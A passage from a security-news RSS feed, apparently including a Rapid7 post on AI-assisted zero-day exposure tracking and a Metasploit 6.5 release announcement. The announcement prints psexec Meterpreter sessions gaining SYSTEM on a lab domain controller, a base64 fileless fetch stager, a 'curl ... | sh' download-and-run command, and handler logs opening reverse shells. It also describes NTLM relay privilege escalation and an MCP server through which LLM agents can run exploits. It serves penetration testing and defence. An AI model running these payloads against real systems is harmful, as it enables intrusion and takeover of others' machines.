<p class="wp-block-paragraph">BOD 26-04 is an important step forward. But AI has already made risk-based patching table stakes. In the AI era, the organizations that succeed won’t necessarily be those that patch the fastest. They’ll be the ones that understand their exposure better than the attackers trying to exploit it.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI is Rewriting the Zero-Day Playbook for Preemptive Security]]></title>
<description><![CDATA[The scenario is all too familiar for any cybersecurity professional: It’s late in the day, and a critical zero-day vulnerability is disclosed. When this happens, CISOs from every industry immediately turn to their Security Operations Centers (SOC) with the single most important, and often most di...]]></description>
<link>https://tsecurity.de/de/3697642/it-security-nachrichten/how-ai-is-rewriting-the-zero-day-playbook-for-preemptive-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697642/it-security-nachrichten/how-ai-is-rewriting-the-zero-day-playbook-for-preemptive-security/</guid>
<pubDate>Mon, 03 Aug 2026 00:06:52 +0200</pubDate>
<content:encoded><![CDATA[<p><span>The scenario is all too familiar for any cybersecurity professional: It’s late in the day, and a critical zero-day vulnerability is disclosed. When this happens, CISOs from every industry immediately turn to their Security Operations Centers (SOC) with the single most important, and often most difficult, question: "Are we exposed?”</span></p><p><span>Answering questions like these when zero-days drop tends to trigger a frantic, high-stress fire drill. Analysts scramble to cross-reference outdated Configuration Management Databases (CMDBs), query disparate endpoint detection tools, and ping IT administrators. The data is siloed, context is missing, and time rapidly slips away. </span></p><p><span>Today, the window between a vulnerability’s disclosure and its active </span><a href="https://www.rapid7.com/research/report/global-threat-landscape-report-2026" target="_self"><span>exploitation in the wild has essentially collapsed,</span></a><span> making predictive lead time a thing of the past. As adversaries integrate AI into their playbooks to automate attacks, defending against them requires us to operate at machine speed.</span></p><p><span>We believe preemptive security is the most effective way to close this window. You cannot wait for every alert to fire to understand your environment. You need an architecture that constantly tracks emerging risks and threats, coupled with AI-accelerated discovery that brings your attack surface into sharp focus before the adversary does. Rapid7 is previewing a series of new features at Black Hat USA 2026 designed to transform the way security teams navigate the chaos of a zero-day threat to identify and close attack paths before they are exploited.  </span></p><h2>The foundation: Continuous Software Visibility</h2><p><span>You cannot secure what you cannot see, and in highly distributed, AI-enabled environments, absolute visibility has traditionally been a gap. To achieve true preemptive security, you need a complete, continuous view of emerging risks. When a zero-day drops, your platform should already be tracking it via an Emerging Threat Response (ETR) process. But knowing the threat exists is only step one; you must correlate that threat with your specific environment. This is where Rapid7 Software Visibility </span><span><em>(in-preview</em></span><span>) becomes important.</span></p><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2dc8e19eb05d1ceb/6a689d25b08d720100bb810d/Software-Visibility.png" alt="Software-Visibility.png" caption="Software Visibility: Depicts details of installed vulnerable software across the technology stack." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Software-Visibility.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2dc8e19eb05d1ceb/6a689d25b08d720100bb810d/Software-Visibility.png" data-sys-asset-uid="blt2dc8e19eb05d1ceb" data-sys-asset-filename="Software-Visibility.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Software Visibility: Depicts details of installed vulnerable software across the technology stack." data-sys-asset-alt="Software-Visibility.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Software Visibility: Depicts details of installed vulnerable software across the technology stack.</figcaption></div></figure><p>⠀</p><p><span>Instead of initiating massive, disruptive network scans, security teams can drill directly into the ETR to view key details of the vulnerability, pinpointing relevant assets and software versions in real-time. For example, if a new zero-day dictates that versions of Safari earlier than 18 are vulnerable, Software Visibility allows you to instantly map that criteria against your entire technology stack. That expansive view into your attack surface allows you to uncover whether this newly discovered exposure exists within your environment, shifting your posture from reactive investigation to proactive defense.</span></p><h2>Calculating the blast radius: Decoding toxic combinations</h2><p><span>Once you know that you have vulnerable instances of Safari running in your environment, the CISO’s initial question evolves. It is no longer just </span><span><em>"Are we exposed?"</em></span><span> but rather, </span><span><em>"How exposed are we?"</em></span></p><p><span>Answering this requires breaking down the traditional silos of security data. A vulnerable service running on an isolated sandbox is a minor blip. That same vulnerable service hosted on a production machine where a highly privileged service account recently left a cached credential in memory is a direct path to domain compromise.</span></p><p><span>To accurately gauge risk, you need a unified view of your attack surface that pulls together both internal and external telemetry, and lets teams find the information easily. Rapid7’s Exposure Command accelerates this level of exposure discovery with natural language queries (</span><span><em>in preview</em></span><span>), so that instead of writing complex syntax, plain-English questions will uncover shadow AI models, pinpoint insecure assets, or identify overprivileged users. A SOC analyst can simply ask the platform in plain English: </span><span><em>"Show me all assets running Safari earlier than version 18."</em></span></p><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7a21d9bd282c760a/6a689d4bc6146fe1fcf909fe/Natural-language-queries.png" alt="Natural-language-queries.png" caption="Natural language queries: Displays a quick, intuitive way to reveal valuable information about the attack surface." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Natural-language-queries.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7a21d9bd282c760a/6a689d4bc6146fe1fcf909fe/Natural-language-queries.png" data-sys-asset-uid="blt7a21d9bd282c760a" data-sys-asset-filename="Natural-language-queries.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Natural language queries: Displays a quick, intuitive way to reveal valuable information about the attack surface." data-sys-asset-alt="Natural-language-queries.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Natural language queries: Displays a quick, intuitive way to reveal valuable information about the attack surface.</figcaption></div></figure><p>⠀</p><p><span>The platform reveals the total footprint, but more importantly, it also uncovers toxic combinations. It highlights not just the vulnerable assets and software, but can also highlight the specific users associated with those systems. By illuminating these connections, security teams can prioritize their response based on actual business risk rather than generic CVSS scores.</span></p><h2>Bridging the SecOps / ITOps divide: Actionable remediation</h2><p><span>Identifying the risk is a security function, but fixing it almost always falls to IT Operations. The friction between these two departments usually goes something like this: the SOC demands immediate patching to stop a breach; ITOps demands testing to ensure the patch does not break critical business services.</span></p><p><span>To achieve preemptive security, we help streamline this important handoff between teams. For instance, when a critical zero-day hits, a patch is often unavailable for days. In the interim, Rapid7 Exposure Command can provide mitigation guidance to help organizations minimize their risk using existing security controls, even when a formal patch does not exist.</span></p><p><span>Once a patch is released or a formal CVE number is assigned, the challenge shifts to rapid, safe deployment. To accelerate this, Rapid7 leverages AI-Generated Remediation Summaries (available now). Rather than tossing a massive spreadsheet of vulnerable IP addresses over to IT, these AI summaries provide highly tailored, environment-specific guidance.</span></p><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0171eca9dba746dd/6a689dab5f29188c8913a257/Remediation-summaries.png" alt="Remediation-summaries.png" caption="Remediation summaries: AI-powered summary of remediation guidance." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Remediation-summaries.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0171eca9dba746dd/6a689dab5f29188c8913a257/Remediation-summaries.png" data-sys-asset-uid="blt0171eca9dba746dd" data-sys-asset-filename="Remediation-summaries.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Remediation summaries: AI-powered summary of remediation guidance." data-sys-asset-alt="Remediation-summaries.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Remediation summaries: AI-powered summary of remediation guidance.</figcaption></div></figure><p>⠀</p><p><span>The AI contextualizes the vulnerability findings based on your existing security controls, established asset ownership, and the unique makeup of your attack surface. It translates raw vulnerability data into clear, actionable narratives, empowering ITOps to quickly understand not just </span><span><em>what</em></span><span> needs to be patched, but </span><span><em>how</em></span><span> to securely and efficiently deploy those patches with minimal disruption to the business.</span></p><h2>Communicating up: Translating data into cross-functional narratives</h2><p><span>While the SOC and IT are working to remediate the threat, the business demands constant updates. The CISO, the executive team, and the board of directors need to know the organization's real-time risk posture.</span></p><p><span>Historically, translating deeply technical security metrics into executive-ready reports meant a security analyst would spend hours manually interpreting data, formatting charts, and building slide decks. These are valuable hours that should have been spent actively hunting threats.</span></p><p><span>To address this, Rapid7 is introducing AI Dashboard Summaries (</span><span><em>in preview</em></span><span>). This capability automatically transforms dense, data-heavy dashboards into plain-text, actionable narratives. The platform generates a powerful, easy-to-digest summary of the active risk posture, allowing security leaders to give leadership and cross-functional partners exactly what they need: clear, confident answers, delivered immediately.</span></p><p><span>We also recognize that security telemetry doesn't exist in a vacuum. Organizations need complete control over their data. If you want to integrate this vulnerability intelligence with broader enterprise risk models, you can seamlessly export this data to your AI analytics engine of choice via a Model Context Protocol (MCP) server. This flexibility ensures you can add context or perform secondary risk analysis exactly as your business requires.</span></p><h2>The preemptive future</h2><p><span>The scenario described above is just a snapshot of how AI-enabled capabilities are fundamentally changing the defensive landscape. By leveraging continuous software visibility, AI-accelerated discovery, and automated remediation guidance, we can stay ahead of the ever-narrowing window between vulnerability disclosures and active exploits.</span></p><p><span>Preemptive security is about building an environment so visible, so well-understood, and so seamlessly integrated that when the inevitable zero-day drops, panic is replaced by precision. Whether it is navigating complex toxic combinations, securing ephemeral cloud workloads, or implementing robust mitigations when no patch is available, these Rapid7 AI-enabled capabilities lay the groundwork for teams to outpace the adversary.</span></p><p><a href="https://rapid7.registration.goldcast.io/events/b8338aa4-1f61-4e0d-bc9e-632ef0ca49a9" target="_blank"><span>Visit us at BlackHat</span></a><span> to see these capabilities in action!</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Framework 6.5 Released]]></title>
<description><![CDATA[Today we’re proud to announce that Metasploit Framework version 6.5 has been released. Over the past two years, with the help of countless contributors, we’ve added 422 new modules along with a whole slew of new features.Malleable C2 Profiles for HTTPOne of the latest and most requested features ...]]></description>
<link>https://tsecurity.de/de/3697639/it-security-nachrichten/metasploit-framework-65-released/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697639/it-security-nachrichten/metasploit-framework-65-released/</guid>
<pubDate>Mon, 03 Aug 2026 00:06:50 +0200</pubDate>
<content:encoded><![CDATA[<p>Today we’re proud to announce that Metasploit Framework version 6.5 has been released. Over the past two years, with the help of countless contributors, we’ve added 422 new modules along with a whole slew of new features.</p><h2>Malleable C2 Profiles for HTTP</h2><p>One of the latest and most requested features is support for Malleable C2 profiles across all current Meterpreter payloads. This feature enables users to load a standard profile into Meterpreter and change the shape of its HTTP(S) traffic. All Meterpreters, including Windows, Java, Python, PHP and Linux, have been updated with this functionality. Due to the size restrictions on staged payloads, staged payloads will only use the Malleable C2 configuration once the stage has been loaded. Since stageless payloads skip the download phase, they immediately use the Malleable C2 configuration.</p><p>When a compatible payload has been selected, the user only needs to set the <span data-type="inlineCode">MALLEABLEC2</span> option to the profile on disk. The syntax for profiles is the same as in other tools which ensures that Metasploit is capable of loading <a href="http://github.com/BC-SECURITY/Malleable-C2-Profiles">publicly</a> available profiles. While not all of the directives are currently in use, additional improvements will be made in the future.</p><p>In the following example, an HTTP Meterpreter is deployed with a profile to emulate browsing Amazon.</p><pre>msf exploit(windows/smb/psexec) &gt; set PAYLOAD windows/x64/meterpreter_reverse_http
PAYLOAD =&gt; windows/x64/meterpreter_reverse_http
msf exploit(windows/smb/psexec) &gt; set MALLEABLEC2 amazon.profile
MALLEABLEC2 =&gt; amazon.profile
msf exploit(windows/smb/psexec) &gt; run
[*] Started HTTP reverse handler on http://192.168.159.128:8081/
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[!] 192.168.159.10:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 192.168.159.10:445 - Uploading payload... BqjvmNxF.exe
[*] 192.168.159.10:445 - Created \BqjvmNxF.exe...
[+] 192.168.159.10:445 - Service started successfully...
[*] 192.168.159.10:445 - Deleting \BqjvmNxF.exe...
[*] http://192.168.159.128:8081/ handling request from 192.168.159.10; (UUID: lh15pukd) Redirecting stageless: URI '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books' with UA 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' -&gt; UUID NjFswaV1VEGJ1ojU44aMCAHc2CTIr56KDkzFLcyRHZ8Go9fwFFaBp8QSiN6WYHoH5j-Oz81kEMXA9tYzxcpvs5e
[*] http://192.168.159.128:8081/ handling request from 192.168.159.10; (UUID: lh15pukd) Attaching orphaned/stageless session...
[*] Meterpreter session 3 opened (192.168.159.128:8081 -&gt; 192.168.159.10:49853) at 2026-07-09 16:34:39 -0400

meterpreter &gt; getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter &gt; sysinfo
Computer        : DC
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter &gt;</pre><p>For more information, usage instructions, and what profile verbs are supported, see the <a href="https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-malleable-c2-profiles.html" target="_blank">Malleable C2 documentation</a>.</p><h2>Metasploit Framework 6.5 Release - MCP Server</h2><p>Metasploit 6.5 introduces the Metasploit MCP Server (<span data-type="inlineCode">msfmcpd</span>), a new middleware layer designed to facilitate secure, structured interactions between AI applications and the Metasploit Framework. By leveraging the Model Context Protocol, the server exposes 16 standardized tools—ranging from complex reconnaissance queries to active session management—allowing users to integrate Metasploit’s powerful capabilities directly into AI-driven environments like Claude or Cursor.</p><h3>Toolset Categorization</h3><p>The toolset is partitioned into two distinct categories to prioritize operator oversight:</p><ul><li><strong>Read-Only Tools:</strong> These 12 tools are available by default and provide deep access to the Framework's intelligence. This includes modules for searching available exploits, querying discovered host/service data, retrieving stored credentials, and monitoring active jobs or sessions. These tools allow an LLM to provide situationally aware advice without modifying the state of the target environment. Perfect for use in sensitive environments where full AI autonomy is barred.</li><li><strong>Dangerous Tools:</strong> To ensure safety, these 4 high-impact tools are disabled by default. This class includes methods for executing modules, using module checks, stopping sessions, and writing data to interactive sessions (like Meterpreter). To leverage these for automated exploitation, operators must explicitly enable them via CLI flag (<span data-type="inlineCode">--enable-dangerous-actions</span>), environment variable, or configuration key.</li></ul><h3>Example LLM Workflow</h3><p>With the MCP server configured, an LLM agent can automate parts of the penetration testing and vulnerability validation lifecycle. A typical workflow might look like this:</p><ol><li><strong>Reconnaissance:</strong> The LLM uses <span data-type="inlineCode">msf_host_info</span> and <span data-type="inlineCode">msf_service_info</span> to identify potential targets and msf_search_modules to find relevant exploits matching the target’s service versions.</li><li><strong>Validation:</strong> Upon selecting a module, the agent calls <span data-type="inlineCode">msf_module_check</span> (if enabled) to assess the target's susceptibility without triggering a full exploit attempt.</li><li><strong>Exploitation:</strong> If the check confirms vulnerability, the agent proceeds with <span data-type="inlineCode">msf_module_execute</span>, passing the necessary datastore options.</li><li><strong>Interaction:</strong> Once a session is established, the agent uses <span data-type="inlineCode">msf_session_list</span> to verify the connection and msf_session_read to parse session output, allowing it to interpret the environment and potentially <span data-type="inlineCode">msf_session_write</span> commands to further the engagement.</li></ol><p>This structure allows security professionals to offload repetitive telemetry gathering to AI agents while retaining a strict, policy-driven "human-in-the-loop" gate for all offensive actions.</p><h3>Starting the MCP Server</h3><p>You can start the server using the msfmcpd binary or directly within msfconsole:</p><pre>msf &gt; load mcp
msf &gt; mcp --help</pre><h4>Usage</h4><pre>msf &gt; mcp &lt;subcommand&gt; [options]</pre><h4>Subcommands:</h4><ul><li><span data-type="inlineCode">status</span>: Display MCP server status</li><li><span data-type="inlineCode">start</span>: Start the MCP server</li><li><span data-type="inlineCode">stop</span>: Stop the MCP server</li><li><span data-type="inlineCode">restart</span>: Restart the MCP server</li><li><span data-type="inlineCode">help</span>: Show this help message</li></ul><h4>Common Options:</h4><ul><li><span data-type="inlineCode">ServerHost=&lt;host&gt;</span>: Bind address (default: localhost)</li><li><span data-type="inlineCode">ServerPort=&lt;port&gt;</span>: MCP port (default: 3000)</li><li><span data-type="inlineCode">DangerousActions=&lt;true|false&gt;</span>: Enable destructive tools (default: false)</li><li><span data-type="inlineCode">RpcHost,RpcPort,RpcUser,RpcPass,RpcSSL</span>: RPC configuration settings.</li><li><span data-type="inlineCode">RateLimit=&lt;n&gt;</span>: Requests per minute (default: 60)</li></ul><h4>Examples:</h4><pre>msf &gt; mcp start
msf &gt; mcp start ServerPort=8080
msf &gt; mcp start RpcUser=msf RpcPass=secret</pre><h2>Relaying Improvements</h2><p>Over the past few years, Metasploit has been making incremental improvements to its NTLM relaying capabilities. While NTLM is considered a legacy authentication protocol, it remains commonly deployed in enterprise environments. This release continues that trend by adding the second NTLM relay server to the framework; HTTP(S). Users can now start a malicious HTTP server that will prompt for authentication and relay it to one or more user-specified targets.</p><p></p><p>Users can leverage this capability with the new <span data-type="inlineCode">auxiliary/server/relay/http_to_smb</span> and <span data-type="inlineCode">auxiliary/server/relay/http_to_ldap</span> modules. These will open SMB and LDAP sessions respectively and allow the user to interact with the target server in the context of the user whose credentials were relayed. Interactive protocol sessions have been around for a couple of years now and offer users a more fault-tolerant way to interact with targets when compared to the old “only psexec” option. SMB sessions have also been updated with sessions -u support, enabling users to upgrade an interactive SMB session to a Meterpreter session using psexec when desired.</p><h3>NTLMRelay2Self</h3><p>The new capability to relay from an HTTP server to another target opens the possibility for unique attack workflows. One such technique is known as NTLMRelay2Self. This multi-step workflow involves coercing a target to authenticating to itself over HTTP which creates a relaying opportunity. After exploiting that relay opportunity, an attacker can establish an LDAP session to a domain controller, authenticated as the machine account. From this position they can leverage RBCD or Shadow Credentials to elevate their permissions on the target workstation (not the domain controller).</p><p>While all of these steps can be performed manually, Metasploit added a new <span data-type="inlineCode">exploits/windows/local/ntlm_relay_2_self</span> module to automate this entire process, performing the relay step as well as the others in a single action. This particular attack technique does not have a patch but does require a local user on a domain joined workstation in order to exploit; effectively making it an evergreen LPE.</p><h2>Fetch Payload Improvements</h2><p>Fetch payloads were created to support users in writing exploits targeting the wave of new command injection vulnerabilities we saw coming in several years ago. They allow a user to generate a small command-based stager that runs on a target host and calls back to download a full binary payload to run it, giving users the ability to launch a fully-featured binary (EXE, ELF, or DLL) payload using only a single command injection. Three new features we added to extend the utility for Fetch Payloads to our users include Fileless Fetch Payloads, Pipe Fetch Payloads, and support for a new multi pseudoarchitecture payload. Fileless Fetch payloads are wonderfully named; previously, when the Fetch command stager ran, the binary payload was saved to a location on disk and launched. Fileless Fetch Payloads leverage a feature within the Linux Kernel after 3.17 that allows us to write a file directly to memory using the memfd_create syscall and execute it, so no files ever touch the target disk. There are three supported ways to use Fetch Fileless: Python3.8+, shell, and shell-search. Each uses a different technique to create a file in memory and launch it.</p><p>Fetch Pipe was created in response to several exploits that we discovered had very small command size requirements, and we found ourselves trying to shrink the command to fetch the binary payload. Fetch Pipe Payloads simply add an extra Fetch command stager so that the user only needs to run a very small command on the remote host that requests a larger command, which, in turn, requests the binary payload. It allowed us to drop the size of the payloads dramatically, and opened the door to create more complex and feature-rich Fetch command stagers since we could use the tiny “pre-stager” rather than a stager with added length, complexity, and encoding requirements.</p><p>For example, here we generate the command for a fileless fetch payload:</p><pre>msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &gt; generate -f raw
[*] Command to execute on target: echo -n 'd3JpdGVieXRlcyAoKSB7IHByaW50ZiBcXCUwM28gIiRAIiA7IH07dmRzb19hZGRyPSQoKDB4JChncmVwIC1GICJbdmRzb10iIC9wcm9jLyQkL21hcHMgfCBjdXQgLWQnLScgLWYxKSkpO2ptcD0iNDhiOCIkKGVjaG8gJChwcmludGYgJTAxNnggJHZkc29fYWRkcikgfCByZXYgfCBzZWQgLUUgJ3MvKC4pKC4pL1wyXDEvZycpImZmZTAiO3NjPSc0ODMxZjY1NjU0NWY0OGM3YzBjMWZlZmZmZjQ4ZjdkODBmMDU0ODg5YzdiMDRkMGYwNTZhMjI1ODBmMDUnO3JlYWQgc3lzY2FsbF9pbmZvIDwgL3Byb2Mvc2VsZi9zeXNjYWxsO2FkZHI9JCgoJChlY2hvICRzeXNjYWxsX2luZm8gfCBjdXQgLWQnICcgLWY5KSkpO2V4ZWMgMz4vcHJvYy9zZWxmL21lbTtkZCBicz0xIHNraXA9JHZkc29fYWRkciA8JjMgPi9kZXYvbnVsbCAyPiYxO3ByaW50ZiAiJCh3cml0ZWJ5dGVzIGBwcmludGYgJHNjIHwgc2VkICdzLy5cezJcfS8weCYgL2cnYCkiID4mMztleGVjIDM+Ji07ZXhlYyAzPi9wcm9jL3NlbGYvbWVtO2RkIGJzPTEgc2tpcD0kYWRkciA8JjMgPi9kZXYvbnVsbCAyPiYxO3ByaW50ZiAiJCh3cml0ZWJ5dGVzIGBwcmludGYgJGptcCB8IHNlZCAncy8uXHsyXH0vMHgmIC9nJ2ApIiA+JjM7' | base64 -d | ${SHELL} &amp; cd /proc/$!;og_process=$!;sleep 2;FOUND=0;if [ $FOUND -eq 0 ];then for f in $(find ./fd -type l -perm u=rwx 2&gt;/dev/null);do if [ $(ls -al $f | grep -o "memfd" &gt;/dev/null; echo $?) -eq "0" ];then if $(curl -so $f http://10.5.135.210:8080/20s16UxqPChr1I-hZk-vRg &gt;/dev/null);then $f &amp; FOUND=1;break;fi;fi;done;fi;sleep 2;kill -9 $og_process;
echo -n 'd3JpdGVieXRlcyAoKSB7IHByaW50ZiBcXCUwM28gIiRAIiA7IH07dmRzb19hZGRyPSQoKDB4JChncmVwIC1GICJbdmRzb10iIC9wcm9jLyQkL21hcHMgfCBjdXQgLWQnLScgLWYxKSkpO2ptcD0iNDhiOCIkKGVjaG8gJChwcmludGYgJTAxNnggJHZkc29fYWRkcikgfCByZXYgfCBzZWQgLUUgJ3MvKC4pKC4pL1wyXDEvZycpImZmZTAiO3NjPSc0ODMxZjY1NjU0NWY0OGM3YzBjMWZlZmZmZjQ4ZjdkODBmMDU0ODg5YzdiMDRkMGYwNTZhMjI1ODBmMDUnO3JlYWQgc3lzY2FsbF9pbmZvIDwgL3Byb2Mvc2VsZi9zeXNjYWxsO2FkZHI9JCgoJChlY2hvICRzeXNjYWxsX2luZm8gfCBjdXQgLWQnICcgLWY5KSkpO2V4ZWMgMz4vcHJvYy9zZWxmL21lbTtkZCBicz0xIHNraXA9JHZkc29fYWRkciA8JjMgPi9kZXYvbnVsbCAyPiYxO3ByaW50ZiAiJCh3cml0ZWJ5dGVzIGBwcmludGYgJHNjIHwgc2VkICdzLy5cezJcfS8weCYgL2cnYCkiID4mMztleGVjIDM+Ji07ZXhlYyAzPi9wcm9jL3NlbGYvbWVtO2RkIGJzPTEgc2tpcD0kYWRkciA8JjMgPi9kZXYvbnVsbCAyPiYxO3ByaW50ZiAiJCh3cml0ZWJ5dGVzIGBwcmludGYgJGptcCB8IHNlZCAncy8uXHsyXH0vMHgmIC9nJ2ApIiA+JjM7' | base64 -d | ${SHELL} &amp; cd /proc/$!;og_process=$!;sleep 2;FOUND=0;if [ $FOUND -eq 0 ];then for f in $(find ./fd -type l -perm u=rwx 2&gt;/dev/null);do if [ $(ls -al $f | grep -o "memfd" &gt;/dev/null; echo $?) -eq "0" ];then if $(curl -so $f http://10.5.135.210:8080/20s16UxqPChr1I-hZk-vRg &gt;/dev/null);then $f &amp; FOUND=1;break;fi;fi;done;fi;sleep 2;kill -9 $og_process;</pre><p>Here is that same command with fetch_pipe enabled:</p><pre>msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &gt; set fetch_pipe true 
fetch_pipe =&gt; true
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &gt; set fetch_uripath x
fetch_uripath =&gt; x
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) &gt; generate -f raw
[*] Command to execute on target: curl -s http://10.5.135.210:8080/x|sh
curl -s http://10.5.135.210:8080/x|sh</pre><p><br>By enabling the fetch pipe option, our payload to run on the target went from 2,374 characters to 38.</p><p>The final new feature added to Fetch Payloads in 6.5 is support for a new multi pseudoarchitecture. The new multi pseudoarchitecture allows users to generate a Fetch payload command stager that will run and report back the architecture of the target host while it requests the binary payload, allowing the Fetch Handler to serve a payload that matches the target architecture. This is incredibly useful during the exploitation of modern Linux hardware, as a Linux host could be running on one of many architectures from x86_64 to ARM. The new multi pseudoarch allows a user to send a payload in an exploit to a Linux host and have it “just work” regardless of the underlying architecture, thus eliminating the users need to know (or correctly guess).</p><p>Here is an example of generating a Fetch Multi payload and handler, then running the Fetch command stager on several different Linux targets, each running a different architecture:</p><pre>msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; show options

Module options (payload/cmd/linux/http/multi/meterpreter_reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, GET, TFTP, TNFTP,
                                               WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous
                                              handles, requires Linux ≥3.17 (for Python variant also Python ≥3
                                              .8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+
                                              , shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH   x                no        Local URI to use for serving payload
   LHOST           10.5.135.210     yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  true             yes       Host both the binary payload and the command so it can be piped dire
                                          ctly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      cldOGvRDplZ      no        Name to use on remote system when storing payload; cannot co
                                                  ntain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


View the full module info with the info, or info -d command.

msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; to_handler
[*] Command to execute on target: curl -s http://10.5.135.210:8080/x|sh
[*] Payload Handler Started as Job 0

[*] Fetch handler listening on 10.5.135.210:8080
[*] HTTP server started
[*] Adding resource /csmCra8lnQTHxFXkipQC0w
[*] Adding resource /x
[*] Started reverse TCP handler on 10.5.135.210:4444 
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; [*] Client 10.5.132.212 requested /x
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Client 10.5.132.212 requested /csmCra8lnQTHxFXkipQC0w?arch=armv7l
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for armle arch
[*] Meterpreter session 1 opened (10.5.135.210:4444 -&gt; 10.5.132.212:45068) at 2026-07-14 11:33:18 -0500
[*] Client 10.5.132.214 requested /x
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Client 10.5.132.214 requested /csmCra8lnQTHxFXkipQC0w?arch=aarch64
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for aarch64 arch
[*] Meterpreter session 2 opened (10.5.135.210:4444 -&gt; 10.5.132.214:39894) at 2026-07-14 11:33:26 -0500
[*] Client 10.5.132.224 requested /x
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Client 10.5.132.224 requested /csmCra8lnQTHxFXkipQC0w?arch=mips64
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for mips64 arch
[*] Meterpreter session 3 opened (10.5.135.210:4444 -&gt; 10.5.132.224:53506) at 2026-07-14 11:33:41 -0500

msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (10.5.132.212)
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : cmd/linux
[*] Running 'sysinfo' on meterpreter session 2 (10.5.132.214)
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : cmd/linux
[*] Running 'sysinfo' on meterpreter session 3 (10.5.132.224)
Computer     : ubnt
OS           : Debian 9.13 (Linux 4.9.79-UBNT)
Architecture : mips64
BuildTuple   : mips64-linux-muslsf
Meterpreter  : cmd/linux
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt;</pre><p>As you can see, the same short command (<span data-type="inlineCode">curl -s http://10.5.135.210:8080/x|sh</span>) with the same handler serves the corresponding binary payload to ARMLE, AARCH64, and MIPS64-based Linux hosts.</p><h2>Block API Hashes Are Randomized</h2><p>The <span data-type="inlineCode">block API</span> is a critical piece of shellcode that is the foundation of all of Metasploit's 32-bit and 64-bit payloads. It enables the shellcode author to invoke win32 API methods using a 32-bit hash of the method and module name. It’s been over 5 years since <a href="https://github.com/rapid7/metasploit-framework/pull/13832">Metasploit started randomizing</a> this piece of shellcode so its 140+ static bytes were no longer trivial signature fodder. What remained however were static the 32-bit API hashes, whose usage was periodically the subject of various reports. This year, Metasploit updated the block API itself to allow the 32-bit hashes to also be randomized. Now each time the block API is generated, not only are the instructions shuffled but the hashes used to invoke win32 API methods are randomized.</p><h2>ATT&amp;CK Metadata</h2><p>When you have about 4500 exploit auxiliary and post modules, discoverability can be a real problem. One thing Metasploit often deals with is ensuring that users have optimal means to find what they are looking for. Historically this has manifested itself as search improvements and even an <a 